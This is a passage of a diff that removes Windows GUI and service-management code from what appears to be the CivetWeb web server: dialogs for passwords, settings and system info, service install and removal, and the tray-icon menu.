-		*p = (char)(u + 32);
-		p++;
-	}
-}
-
-
-static void add_control(unsigned char **mem,
-                        DLGTEMPLATE *dia,
-                        WORD type,
-                        WORD id,
-                        DWORD style,
-                        short x,
-                        short y,
-                        short cx,
-                        short cy,
-                        const char *caption);
-
-
-static int
-get_password(const char *user,
-             const char *realm,
-             char *passwd,
-             unsigned passwd_len)
-{
-#define HEIGHT (15)
-#define WIDTH (280)
-#define LABEL_WIDTH (90)
-
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	int ok;
-	short y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	assert((user != NULL) && (realm != NULL) && (passwd != NULL));
-
-	/* Only allow one instance of this dialog to be open. */
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return 0;
-	}
-
-	/* Do not open a password dialog, if the username is empty */
-	if (user[0] == 0) {
-		s_dlg_proc_param.guard = 0;
-		return 0;
-	}
-
-	/* Create a password suggestion */
-	memset(passwd, 0, passwd_len);
-	suggest_passwd(passwd);
-
-	/* Make buffer available for input dialog */
-	s_dlg_proc_param.buffer = passwd;
-	s_dlg_proc_param.buflen = passwd_len;
-
-	/* Create the dialog */
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	y = HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "User:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 1,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            user);
-
-	y += HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "Realm:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 2,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            realm);
-
-	y += HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "Password:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_INPUT_LINE,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL | WS_TABSTOP,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            "");
-
-	y += (WORD)(HEIGHT * 2);
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDOK,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            80,
-	            y,
-	            55,
-	            12,
-	            "Ok");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDCANCEL,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            140,
-	            y,
-	            55,
-	            12,
-	            "Cancel");
-
-	assert((intptr_t)p - (intptr_t)mem < (intptr_t)sizeof(mem));
-
-	dia->cy = y + (WORD)(HEIGHT * 1.5);
-
-	s_dlg_proc_param.name = "Modify password";
-	s_dlg_proc_param.fRetry = NULL;
-
-	ok =
-	    (IDOK == DialogBoxIndirectParam(
-	                 NULL, dia, NULL, InputDlgProc, (LPARAM)&s_dlg_proc_param));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-	return ok;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-/* Dialog proc for password dialog */
-static INT_PTR CALLBACK
-PasswordDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static const char *passfile = 0;
-	char domain[256], user[256], password[256];
-	WORD ctrlId;
-	struct dlg_proc_param *pdlg_proc_param;
-
-	switch (msg) {
-	case WM_CLOSE:
-		passfile = 0;
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		ctrlId = LOWORD(wParam);
-		if (ctrlId == ID_ADD_USER) {
-			/* Add user */
-			GetWindowText(GetDlgItem(hDlg, ID_ADD_USER_NAME),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ID_ADD_USER_REALM),
-			              domain,
-			              sizeof(domain));
-			if (get_password(user, domain, password, sizeof(password))) {
-				mg_modify_passwords_file(passfile, domain, user, password);
-				EndDialog(hDlg, IDOK);
-			}
-		} else if ((ctrlId >= (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 3))
-		           && (ctrlId < (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 4))) {
-			/* Modify password */
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 3),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 2),
-			              domain,
-			              sizeof(domain));
-			if (get_password(user, domain, password, sizeof(password))) {
-				mg_modify_passwords_file(passfile, domain, user, password);
-				EndDialog(hDlg, IDOK);
-			}
-		} else if ((ctrlId >= (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 2))
-		           && (ctrlId < (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 3))) {
-			/* Remove user */
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 2),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA),
-			              domain,
-			              sizeof(domain));
-			mg_modify_passwords_file(passfile, domain, user, NULL);
-			EndDialog(hDlg, IDOK);
-		}
-		break;
-
-	case WM_INITDIALOG:
-		pdlg_proc_param = (struct dlg_proc_param *)lParam;
-		pdlg_proc_param->hWnd = hDlg;
-		passfile = pdlg_proc_param->name;
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-		SetWindowText(hDlg, passfile);
-		SetFocus(GetDlgItem(hDlg, ID_ADD_USER_NAME));
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-static void
-add_control(unsigned char **mem,
-            DLGTEMPLATE *dia,
-            WORD type,
-            WORD id,
-            DWORD style,
-            short x,
-            short y,
-            short cx,
-            short cy,
-            const char *caption)
-{
-	DLGITEMTEMPLATE *tp;
-	LPWORD p;
-
-	dia->cdit++;
-
-	*mem = (unsigned char *)align(*mem, 3);
-	tp = (DLGITEMTEMPLATE *)*mem;
-
-	tp->id = id;
-	tp->style = style;
-	tp->dwExtendedStyle = 0;
-	tp->x = x;
-	tp->y = y;
-	tp->cx = cx;
-	tp->cy = cy;
-
-	p = (LPWORD)align(*mem + sizeof(*tp), 1);
-	*p++ = 0xffff;
-	*p++ = type;
-
-	while (*caption != '\0') {
-		*p++ = (WCHAR)*caption++;
-	}
-	*p++ = 0;
-	p = (LPWORD)align(p, 1);
-
-	*p++ = 0;
-	*mem = (unsigned char *)p;
-}
-
-
-static void
-show_settings_dialog()
-{
-#define HEIGHT (15)
-#define WIDTH (460)
-#define LABEL_WIDTH (90)
-
-	unsigned char mem[16 * 1024], *p;
-	const struct mg_option *options;
-	DWORD style;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	WORD i, cl, nelems = 0;
-	short width, x, y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return;
-	}
-
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		style = WS_CHILD | WS_VISIBLE | WS_TABSTOP;
-		x = 10 + (WIDTH / 2) * (nelems % 2);
-		y = (nelems / 2 + 1) * HEIGHT + 5;
-		width = WIDTH / 2 - 20 - LABEL_WIDTH;
-		if (options[i].type == CONFIG_TYPE_NUMBER) {
-			style |= ES_NUMBER;
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-		} else if (options[i].type == CONFIG_TYPE_BOOLEAN) {
-			cl = 0x80;
-			style |= BS_AUTOCHECKBOX;
-		} else if ((options[i].type == CONFIG_TYPE_FILE)
-		           || (options[i].type == CONFIG_TYPE_DIRECTORY)) {
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-			width -= 20;
-			cl = 0x81;
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + i + ID_FILE_BUTTONS_DELTA,
-			            WS_VISIBLE | WS_CHILD | BS_PUSHBUTTON,
-			            x + width + LABEL_WIDTH + 5,
-			            y,
-			            15,
-			            12,
-			            "...");
-		} else if (options[i].type == CONFIG_TYPE_STRING_MULTILINE) {
-			/* TODO: This is not really uer friendly */
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL | ES_MULTILINE | ES_WANTRETURN
-			         | ES_AUTOVSCROLL;
-		} else {
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-		}
-		add_control(&p,
-		            dia,
-		            0x82,
-		            ID_STATIC,
-		            WS_VISIBLE | WS_CHILD,
-		            x,
-		            y,
-		            LABEL_WIDTH,
-		            HEIGHT,
-		            options[i].name);
-		add_control(&p,
-		            dia,
-		            cl,
-		            ID_CONTROLS + i,
-		            style,
-		            x + LABEL_WIDTH,
-		            y,
-		            width,
-		            12,
-		            "");
-		nelems++;
-
-		assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-	}
-
-	y = (((nelems + 1) / 2 + 1) * HEIGHT + 5);
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_GROUP,
-	            WS_CHILD | WS_VISIBLE | BS_GROUPBOX,
-	            5,
-	            5,
-	            WIDTH - 10,
-	            y,
-	            " Settings ");
-	y += 10;
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_SAVE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 70,
-	            y,
-	            65,
-	            12,
-	            "Save Settings");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_DEFAULTS,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 140,
-	            y,
-	            65,
-	            12,
-	            "Reset to defaults");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_FILE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 210,
-	            y,
-	            65,
-	            12,
-	            "Reload from file");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_ACTIVE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 280,
-	            y,
-	            65,
-	            12,
-	            "Reload active");
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_CHILD | WS_VISIBLE | WS_DISABLED,
-	            5,
-	            y,
-	            100,
-	            12,
-	            g_server_base_name);
-
-	assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-
-	dia->cy = ((nelems + 1) / 2 + 1) * HEIGHT + 30;
-
-	s_dlg_proc_param.fRetry = NULL;
-
-	DialogBoxIndirectParam(
-	    NULL, dia, NULL, SettingsDlgProc, (LPARAM)&s_dlg_proc_param);
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static void
-change_password_file()
-{
-#define HEIGHT (15)
-#define WIDTH (320)
-#define LABEL_WIDTH (90)
-
-	OPENFILENAME of;
-	char path[PATH_MAX] = PASSWORDS_FILE_NAME;
-	char strbuf[256], u[256], d[256];
-	HWND hDlg = NULL;
-	FILE *f;
-	short y, nelems;
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	const char *domain = mg_get_option(g_ctx, "authentication_domain");
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return;
-	}
-
-	memset(&of, 0, sizeof(of));
-	of.lStructSize = sizeof(of);
-	of.hwndOwner = (HWND)hDlg;
-	of.lpstrFile = path;
-	of.nMaxFile = sizeof(path);
-	of.lpstrInitialDir = mg_get_option(g_ctx, "document_root");
-	of.Flags = OFN_CREATEPROMPT | OFN_NOCHANGEDIR | OFN_HIDEREADONLY;
-
-	if (IDOK != GetSaveFileName(&of)) {
-		s_dlg_proc_param.guard = 0;
-		return;
-	}
-
-	f = fopen(path, "a+");
-	if (f) {
-		fclose(f);
-	} else {
-		MessageBox(NULL, path, "Can not open file", MB_ICONERROR);
-		s_dlg_proc_param.guard = 0;
-		return;
-	}
-
-	do {
-		s_dlg_proc_param.hWnd = NULL;
-		(void)memset(mem, 0, sizeof(mem));
-		(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-		p = mem + sizeof(dialog_header);
-
-		f = fopen(path, "r+");
-		if (!f) {
-			MessageBox(NULL, path, "Can not open file", MB_ICONERROR);
-			s_dlg_proc_param.guard = 0;
-			return;
-		}
-
-		nelems = 0;
-		while (fgets(strbuf, sizeof(strbuf), f)) {
-			if (sscanf(strbuf, "%255[^:]:%255[^:]:%*s", u, d) != 2) {
-				continue;
-			}
-			u[255] = 0;
-			d[255] = 0;
-			y = (nelems + 1) * HEIGHT + 5;
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA * 3,
-			            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-			            10,
-			            y,
-			            65,
-			            12,
-			            "Modify password");
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA * 2,
-			            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-			            80,
-			            y,
-			            55,
-			            12,
-			            "Remove user");
-			add_control(&p,
-			            dia,
-			            0x81,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA,
-			            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-			                | ES_READONLY,
-			            245,
-			            y,
-			            60,
-			            12,
-			            d);
-			add_control(&p,
-			            dia,
-			            0x81,
-			            ID_CONTROLS + nelems,
-			            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-			                | ES_READONLY,
-			            140,
-			            y,
-			            100,
-			            12,
-			            u);
-
-			nelems++;
-			assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-		}
-		fclose(f);
-
-		y = (nelems + 1) * HEIGHT + 10;
-		add_control(&p,
-		            dia,
-		            0x80,
-		            ID_ADD_USER,
-		            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-		            80,
-		            y,
-		            55,
-		            12,
-		            "Add user");
-		add_control(&p,
-		            dia,
-		            0x81,
-		            ID_ADD_USER_NAME,
-		            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-		                | WS_TABSTOP,
-		            140,
-		            y,
-		            100,
-		            12,
-		            "");
-		add_control(&p,
-		            dia,
-		            0x81,
-		            ID_ADD_USER_REALM,
-		            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-		                | WS_TABSTOP,
-		            245,
-		            y,
-		            60,
-		            12,
-		            domain);
-
-		y = (nelems + 2) * HEIGHT + 10;
-		add_control(&p,
-		            dia,
-		            0x80,
-		            ID_GROUP,
-		            WS_CHILD | WS_VISIBLE | BS_GROUPBOX,
-		            5,
-		            5,
-		            WIDTH - 10,
-		            y,
-		            " Users ");
-
-		y += HEIGHT;
-		add_control(&p,
-		            dia,
-		            0x82,
-		            ID_STATIC,
-		            WS_CHILD | WS_VISIBLE | WS_DISABLED,
-		            5,
-		            y,
-		            100,
-		            12,
-		            g_server_base_name);
-
-		assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-
-		dia->cy = y + 20;
-
-		s_dlg_proc_param.name = path;
-		s_dlg_proc_param.fRetry = NULL;
-
-	} while ((IDOK == DialogBoxIndirectParam(NULL,
-	                                         dia,
-	                                         NULL,
-	                                         PasswordDlgProc,
-	                                         (LPARAM)&s_dlg_proc_param))
-	         && (!g_exit_flag));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static BOOL
-sysinfo_reload(struct dlg_proc_param *prm)
-{
-	static char *buf = 0;
-	int cl, rl;
-
-	cl = mg_get_context_info(g_ctx, NULL, 0);
-	free(buf);
-	cl += 510;
-	buf = (char *)malloc(cl + 1);
-	rl = mg_get_context_info(g_ctx, buf, cl);
-	if ((rl > cl) || (rl <= 0)) {
-		if (g_ctx == NULL) {
-			prm->buffer = "Server not running";
-		} else if (rl <= 0) {
-			prm->buffer = "No server statistics available";
-		} else {
-			prm->buffer = "Please retry";
-		}
-	} else {
-		prm->buffer = buf;
-	}
-
-	return TRUE;
-}
-
-
-int
-show_system_info()
-{
-#define HEIGHT (15)
-#define WIDTH (320)
-#define LABEL_WIDTH (50)
-
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	int ok;
-	short y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	/* Only allow one instance of this dialog to be open. */
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return 0;
-	}
-
-	/* Create the dialog */
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	y = HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "System Information:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 1,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_AUTOVSCROLL | ES_MULTILINE | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT * 7,
-	            g_system_info);
-
-	y += (WORD)(HEIGHT * 8);
-
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDRETRY,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 10 - 55 - 10 - 55,
-	            y,
-	            55,
-	            12,
-	            "Reload");
-
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDOK,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 10 - 55,
-	            y,
-	            55,
-	            12,
-	            "Close");
-
-	assert((intptr_t)p - (intptr_t)mem < (intptr_t)sizeof(mem));
-
-	dia->cy = y + (WORD)(HEIGHT * 1.5);
-
-	s_dlg_proc_param.name = "System information";
-	s_dlg_proc_param.fRetry = sysinfo_reload;
-	s_dlg_proc_param.idRetry = ID_CONTROLS + 1; /* Reload field with this ID */
-
-	ok =
-	    (IDOK == DialogBoxIndirectParam(
-	                 NULL, dia, NULL, InputDlgProc, (LPARAM)&s_dlg_proc_param));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-	return ok;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static int
-manage_service(int action)
-{
-	const char *service_name = g_server_name;
-	SC_HANDLE hSCM = NULL, hService = NULL;
-	SERVICE_DESCRIPTION descr;
-	char path[PATH_MAX + 20] = ""; /* Path to executable plus magic argument */
-	int success = 1;
-
-	descr.lpDescription = (LPSTR)g_server_name;
-
-	if ((hSCM = OpenSCManager(NULL,
-	                          NULL,
-	                          action == ID_INSTALL_SERVICE ? GENERIC_WRITE
-	                                                       : GENERIC_READ))
-	    == NULL) {
-		success = 0;
-		show_error();
-	} else if (action == ID_INSTALL_SERVICE) {
-		path[sizeof(path) - 1] = 0;
-		GetModuleFileName(NULL, path, sizeof(path) - 1);
-		strncat(path, " ", sizeof(path) - 1);
-		strncat(path, service_magic_argument, sizeof(path) - 1);
-		hService = CreateService(hSCM,
-		                         service_name,
-		                         service_name,
-		                         SERVICE_ALL_ACCESS,
-		                         SERVICE_WIN32_OWN_PROCESS,
-		                         SERVICE_AUTO_START,
-		                         SERVICE_ERROR_NORMAL,
-		                         path,
-		                         NULL,
-		                         NULL,
-		                         NULL,
-		                         NULL,
-		                         NULL);
-		if (hService) {
-			ChangeServiceConfig2(hService, SERVICE_CONFIG_DESCRIPTION, &descr);
-		} else {
-			show_error();
-		}
-	} else if (action == ID_REMOVE_SERVICE) {
-		if ((hService = OpenService(hSCM, service_name, DELETE)) == NULL
-		    || !DeleteService(hService)) {
-			show_error();
-		}
-	} else if ((hService =
-	                OpenService(hSCM, service_name, SERVICE_QUERY_STATUS))
-	           == NULL) {
-		success = 0;
-	}
-
-	if (hService)
-		CloseServiceHandle(hService);
-	if (hSCM)
-		CloseServiceHandle(hSCM);
-
-	return success;
-}
-
-
-/* Window proc for taskbar icon */
-static LRESULT CALLBACK
-WindowProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static SERVICE_TABLE_ENTRY service_table[2];
-	int service_installed;
-	char buf[200], *service_argv[2];
-	POINT pt;
-	HMENU hMenu;
-	static UINT s_uTaskbarRestart; /* for taskbar creation */
-
-	service_argv[0] = __argv[0];
-	service_argv[1] = NULL;
-
-	memset(service_table, 0, sizeof(service_table));
-	service_table[0].lpServiceName = (LPSTR)g_server_name;
-	service_table[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
-
-	switch (msg) {
-
-	case WM_CREATE:
-		if (__argv[1] != NULL && !strcmp(__argv[1], service_magic_argument)) {
-			start_civetweb(1, service_argv);
-			StartServiceCtrlDispatcher(service_table);
-			exit(EXIT_SUCCESS);
-		} else {
-			start_civetweb(__argc, __argv);
-			s_uTaskbarRestart = RegisterWindowMessage(TEXT("TaskbarCreated"));
-		}
-		break;
-
-	case WM_COMMAND:
-		switch (LOWORD(wParam)) {
-		case ID_QUIT:
-			stop_civetweb();
-			Shell_NotifyIcon(NIM_DELETE, &TrayIcon);
-			g_exit_flag = 1;
-			PostQuitMessage(0);
-			return 0;
-		case ID_SETTINGS:
-			show_settings_dialog();
-			break;
-		case ID_PASSWORD:
-			change_password_file();
-			break;
-		case ID_SYSINFO:
-			show_system_info();
-			break;
-		case ID_INSTALL_SERVICE:
-		case ID_REMOVE_SERVICE:
-			manage_service(LOWORD(wParam));
-			break;
-		case ID_CONNECT:
-			fprintf(stdout, "[%s]\n", get_url_to_first_open_port(g_ctx));
-			ShellExecute(NULL,
-			             "open",
-			             get_url_to_first_open_port(g_ctx),
-			             NULL,
-			             NULL,
-			             SW_SHOW);
-			break;
-		case ID_WEBSITE:
-			fprintf(stdout, "[%s]\n", g_website);
-			ShellExecute(NULL, "open", g_website, NULL, NULL, SW_SHOW);
-			break;
-		}
-		break;
-
-	case WM_USER:
-		switch (lParam) {
-		case WM_RBUTTONUP:
-		case WM_LBUTTONUP:
-		case WM_LBUTTONDBLCLK:
-			hMenu = CreatePopupMenu();
-			AppendMenu(hMenu,
-			           MF_STRING | MF_GRAYED,
-			           ID_SEPARATOR,
-			           g_server_name);
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			service_installed = manage_service(0);
-			snprintf(buf,
-			         sizeof(buf) - 1,
-			         "NT service: %s installed",
-			         service_installed ? "" : "not");
-			buf[sizeof(buf) - 1] = 0;
-			AppendMenu(hMenu, MF_STRING | MF_GRAYED, ID_SEPARATOR, buf);
-			AppendMenu(hMenu,
-			           MF_STRING | (service_installed ? MF_GRAYED : 0),
-			           ID_INSTALL_SERVICE,
-			           "Install service");
-			AppendMenu(hMenu,
-			           MF_STRING | (!service_installed ? MF_GRAYED : 0),
-			           ID_REMOVE_SERVICE,
-			           "Deinstall service");
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			AppendMenu(hMenu, MF_STRING, ID_CONNECT, "Start browser");
-			AppendMenu(hMenu, MF_STRING, ID_SETTINGS, "Edit settings");
-			AppendMenu(hMenu, MF_STRING, ID_PASSWORD, "Modify password file");
-			AppendMenu(hMenu, MF_STRING, ID_SYSINFO, "Show system info");
-			AppendMenu(hMenu, MF_STRING, ID_WEBSITE, "Visit website");
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			AppendMenu(hMenu, MF_STRING, ID_QUIT, "Exit");
-			GetCursorPos(&pt);
-			SetForegroundWindow(hWnd);
-			TrackPopupMenu(hMenu, 0, pt.x, pt.y, 0, hWnd, NULL);
-			PostMessage(hWnd, WM_NULL, 0, 0);
-			DestroyMenu(hMenu);
-			break;
-		}
-		break;
-
-	case WM_CLOSE:
-		stop_civetweb();
-		Shell_NotifyIcon(NIM_DELETE, &TrayIcon);
-		g_exit_flag = 1;
-		PostQuitMessage(0);
-		return 0; /* We've just sent our own quit message, with proper hwnd. */
-
-	default:
-		if (msg == s_uTaskbarRestart)
-			Shell_NotifyIcon(NIM_ADD, &TrayIcon);
-	}
-
-	return DefWindowProc(hWnd, msg, wParam, lParam);
-}
-
-
-static int
-MakeConsole(void)
-{
-	DWORD err;
-	int ok = (GetConsoleWindow() != NULL);
-	if (!ok) {
-		if (!AttachConsole(ATTACH_PARENT_PROCESS)) {
-			FreeConsole();
-			if (!AllocConsole()) {
-				err = GetLastError();
-				if (err == ERROR_ACCESS_DENIED) {
-					MessageBox(NULL,
-					           "Insufficient rights to create a console window",
-					           "Error",
-					           MB_ICONERROR);
-				}
-			}
-			AttachConsole(GetCurrentProcessId());
-		}
-
-		ok = (GetConsoleWindow() != NULL);
-		if (ok) {
-			freopen("CONIN$", "r", stdin);
-			freopen("CONOUT$", "w", stdout);
